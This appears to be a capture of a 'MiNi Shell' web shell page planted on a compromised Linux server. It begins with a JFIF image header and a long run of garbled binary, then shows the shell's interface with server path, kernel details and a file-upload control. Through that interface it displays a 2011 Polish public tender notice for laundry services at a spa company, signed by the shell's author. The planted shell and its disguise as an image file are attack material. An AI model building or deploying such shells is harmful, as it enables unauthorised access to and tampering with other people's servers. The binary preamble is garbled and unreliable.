JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110516/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20110516/138627-N-2011.html

<p class="kh_header"><b>Szczawno Zdrój: Wykonawca:
dla zamówienia pod nazwą Usługi pralnicze 
dla Uzdrowisko Szczawno-Jedlina S.A. w Szczawnie Zdroju</b><br>
<b>Numer ogłoszenia: 138627 - 2011; data zamieszczenia: 16.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uzdrowisko Szczawno-Jedlina S.A. , ul. Ratuszowa 1, 58-310 Szczawno Zdrój, woj. dolnośląskie, tel. 074 8493201, faks 074 8436764.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uzdrowisko.szczawno-jedlina.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonawca:
dla zamówienia pod nazwą Usługi pralnicze 
dla Uzdrowisko Szczawno-Jedlina S.A. w Szczawnie Zdroju.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia opisany jest w SIWZ dostępnej na stronie internetowej Spółki www.szczawno-jedlina.pl

1.	Zakres usługi:
Usługi pralnicze świadczone dla następujących obiektów:
Obiekty w Szczawnie-Zdroju:
Szpital uzdrowiskowy z oddziałem sanatoryjnym Dom Zdrojowy,  ul. Kolejowa 14;
Sanatorium uzdrowiskowe z oddziałem szpitalnym Korona Piastowska,  ul. Wojska Polskiego 1;
Sanatorium uzdrowiskowe Mieszko,  ul. Wojska Polskiego 4;
Szpital uzdrowiskowy z oddziałem sanatoryjnym Młynarz,  ul. Wojska Polskiego 3;
Szpital uzdrowiskowy z oddziałem sanatoryjnym Pionier,  ul. Potockiego 4;
Zakład Przyrodoleczniczy,  ul. Sienkiewicza 1;
Rozlewnia Wód Mineralnych, ul. Sienkiewicza 4;
Dyrekcja,  ul. Ratuszowa 1.
Obiekty w Jedlinie-Zdroju:
Punkt Żywienia, Plac Zdrojowy 4;
Uzdrowiskowy wielospecjalistyczny szpital rehabilitacyjny z oddziałem sanatoryjnym szpital rehabilitacji kardiologicznej Teresa,  Plac Zdrojowy 9;
Sanatorium uzdrowiskowe Warszawianka,  Plac Zdrojowy 3;
Szpital uzdrowiskowy z oddziałem sanatoryjnym nr 7 Dom Zdrojowy, Plac Zdrojowy 1.

Planowana ilość materiału przeznaczona do prania w okresie jednego miesiąca 
ok. 5 010 kg.
Zamawiający oszacował zapotrzebowanie na wymienione produkty na okres 12 miesięcy. Ilości te stanowią wartość szacunkową, co oznacza, że ostateczna ilość zamawiana na podstawie umowy może ulec zmianie. Wykonawcy nie przysługują względem Zamawiającego jakiekolwiek roszczenia z tytułu niezrealizowania pełnej ilości przedmiotu zamówienia.
Wszelkie koszty usługi tj. transport materiałów z - do magazynów Zamawiającego, załadunek, rozładunek, opakowanie (jednorazowe worki z tworzywa sztucznego) na czas transportu, pakowania i materiałów wypranych - ponosi Wykonawca.

2.	Struktura prania:
Przeciętnie - 63% mat. Gr. I, 13% mat Gr. II, 24% mat. Gr. III

3.	Środki piorące, odplamiacze i płyny do płukania:
muszą być dopuszczone do stosowania zgodnie z Ustawą z dnia 11.01.2001 r. o substancjach i preparatach chemicznych (t.j. Dz. U. z 2009 r. nr 152, poz. 1222 z późn. zm.);posiadają atest i pozytywną opinię Państwowego Zakładu Higieny;
muszą być bezzapachowe, antyalergiczne, antyelektrostatyczne;
muszą mieć właściwości dezynfekcyjne;
nie spowodują utraty istotnych cech pranych materiałów.

4.	Organizacja:
1)	Materiały z grupy I, II i III  przeznaczone do prania będą odbierane przez Wykonawcę z magazynów Zamawiającego na żądanie zgłoszone telefonicznie w przeciągu 24 godzin od momentu zgłoszenia przez przedstawiciela Zamawiającego potrzeby dokonania usługi prania. Z zastrzeżeniem pkt. 2.

Wyprane materiały zwracane będą do magazynów, z których zostały pobrane. Czas wykonania usługi od odbioru materiałów przeznaczonych do prania do zwrotu wypranych materiałów, nie dłuższy niż 48 godzin.
Szczegóły odbiorów i dostaw prania będą uzgadniane z wybranym Wykonawcą na spotkaniu w siedzibie Zamawiającego.
Odbiory będą dokonywane na podstawie protokołów zdawczo-odbiorczych zawierających co najmniej:
ilość materiałów do prania i po wypraniu - w sztukach i w kg,
stwierdzone różnice,
uwagi dotyczące jakości usługi.

2)	Materiały z grupy III przeznaczone do prania będą odbierane przez Wykonawcę z magazynów Zamawiającego znajdujących się w Zakładzie Przyrodoleczniczym, ul. Sienkiewicza 1 w Szczawnie-Zdroju i Szpitalu uzdrowiskowym z oddziałem sanatoryjnym Dom Zdrojowy, pl. Zdrojowy 1 
w Jedlinie-Zdroju na żądanie zgłoszone telefonicznie - w soboty o godz. 15.30 

Wyprane materiały zwracane będą do magazynów w poniedziałki o godz. 6.40.

Szczegóły odbiorów i dostaw prania będą uzgadniane z wybranym Wykonawcą na spotkaniu 
w siedzibie Zamawiającego.
Odbiory będą dokonywane na podstawie protokołów zdawczo-odbiorczych zawierających co najmniej:
ilość materiałów do prania i po wypraniu - w sztukach i w kg,
stwierdzone różnice,
uwagi dotyczące jakości usługi.

Wykonana usługa będzie rozliczana na podstawie ilości (kg) materiałów przeznaczonych do prania, odebranych przez Wykonawcę z magazynów Zamawiającego.

Wyprane materiały powinny być dobrze wysuszone, posortowane według funkcji, poskładane i pakowane 
w jednorazowe worki z tworzywa sztucznego zgodnie z zasadami sanitarno-higienicznymi.

Dodatkowo bielizna przekazywana do prania musi być znakowana w sposób indywidualny dla poszczególnych obiektów, dla których wykonywana będzie usługa prania. Szczegóły i sposób oznakowania dla poszczególnych obiektów zostaną ustalone na spotkaniu organizacyjnym z wybranym Wykonawcą. Zamawiający przedstawi Wykonawcy stosowany dotychczas sposób znakowania (identyfikacji) bielizny. Jeżeli Wykonawca będzie wnioskował stosowanie innego sposobu oznakowania (identyfikacji) koszty wprowadzenia takiego sposobu (trwałe oznakowanie) leżą po stronie Wykonawcy, a sposób oznakowania musi zostać zatwierdzony przez Zamawiającego. Zamawiający nie dopuszcza znakowania materiałów będących jego własnością w sposób przez niego niezatwierdzony, powodujący zniszczenie lub trwałe zaplamienie materiału lub zmniejszenie estetyki wyglądu.
Wymagania stawiane Wykonawcy w zakresie realizacji przedmiotu zamówienia:
1)	Wykonawca jest odpowiedzialny za jakość wykonywanej usługi, zgodność z warunkami technicznymi 
i jakościowymi opisanymi dla przedmiotu zamówienia;
2)	wymagana jest należyta staranność przy realizacji zobowiązań umowy;
3)	ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez Zamawiającego 
z ustanowionym przedstawicielem Wykonawcy;
4)	określenie przez Wykonawcę telefonów kontaktowych i numerów fax oraz innych ustaleń niezbędnych dla sprawnego i terminowego wykonania zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 98.31.00.00-9, 98.31.10.00-6, 98.31.20.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sprawdzenie spełnienia ww warunków udziału w postępowaniu odbywać się będzie na podstawie przedłożonych przez Wykonawcę dokumentów i oświadczeń wg formuły spełnia - nie spełnia. 
Z treści załączonych dokumentów musi wynikać jednoznacznie, że ww warunki Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sprawdzenie spełnienia ww warunków udziału w postępowaniu odbywać się będzie na podstawie przedłożonych przez Wykonawcę dokumentów i oświadczeń wg formuły spełnia - nie spełnia. 
Z treści załączonych dokumentów musi wynikać jednoznacznie, że ww warunki Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sprawdzenie spełnienia ww warunków udziału w postępowaniu odbywać się będzie na podstawie przedłożonych przez Wykonawcę dokumentów i oświadczeń wg formuły spełnia - nie spełnia. 
Z treści załączonych dokumentów musi wynikać jednoznacznie, że ww warunki Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sprawdzenie spełnienia ww warunków udziału w postępowaniu odbywać się będzie na podstawie przedłożonych przez Wykonawcę dokumentów i oświadczeń wg formuły spełnia - nie spełnia. 
Z treści załączonych dokumentów musi wynikać jednoznacznie, że ww warunki Wykonawca spełnił.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">-dokument (zaświadczenie, opinia, decyzja, postanowienie) wydany nie wcześniej niż 6 m-cy przed terminem otwarcia ofert przez Państwowego Powiatowego Inspektora Sanitarnego potwierdzający spełnianie wymagań sanitarnych dla środka transportu podległego właścicielowi pralni przeznaczonego do przewozu bielizny z Zakładów Opieki Zdrowotnej. 
- oświadczenie Wykonawcy o realizowaniu przedmiotu zamówienia z wykorzystaniem profesjonalnych środków pralniczych posiadających odpowiednie badania, atesty, certyfikaty zgodnie z przepisami prawa i innymi regulacjami, których oferent zobowiązany jest przestrzegać wraz ze zobowiązaniem do przekazania Zamawiającemu kopii ww. dokumentów na jego prośbę - wg wzoru formularza nr 5 do SIWZ załączonego do SIWZ;
- opis realizacji procesu prania - etapami (od odbioru brudnej bielizny przez procesy typu sortowanie, pranie, suszenie, kompletowanie itp. do przekazania czystej bielizny).</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	pełnomocnictwo w przypadku składania oferty wspólnej,
2)	pełnomocnictwo do działania w imieniu Wykonawcy zgodnie z przepisami k.c. w przypadku, gdy ofertę podpisuje osoba nieupoważniona w dokumentach do reprezentowania Wykonawcy z mocy prawa,
3)	zaparafowany projekt umowy - wg wzoru formularza nr 2 załączonego do SIWZ, 
4)	opis realizacji procesu prania - etapami (od odbioru brudnej bielizny przez procesy typu sortowanie, pranie, suszenie, kompletowanie itp. do przekazania czystej bielizny).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Do umowy maja zastosowanie przepisy kodeksu cywilnego, jeżeli przepisy ustawy nie stanowią inaczej.
Najistotniejsze postanowienia umowy zawarto w Projekcie umowy - wg wzoru formularza nr 2 załączonego do SIWZ.
1.	Zamawiający przewiduje zmianę umowy w następujących przypadkach:
1)	jeżeli zmiana umowy jest korzystna dla Zamawiającego (korzyść ekonomiczna, techniczna, eksploatacyjna);
2)	jeżeli wystąpiły okoliczności, których przy dołożeniu należytej staranności strony na dzień podpisania umowy przewidzieć nie mogły, a wynikają one ze zmian przepisów prawa, które nastąpiły w czasie realizacji zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www. szczawno-jedlina.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uzdrowisko Szczawno-Jedlina S.A.
ul. Ratuszowa 1, 58-310 Szczawno Zdrój.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.05.2011 godzina 10:00, miejsce: Uzdrowisko Szczawno-Jedlina S.A., ul. Ratuszowa 1, 58-310 Szczawno Zdrój, Kancelaria ( I piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com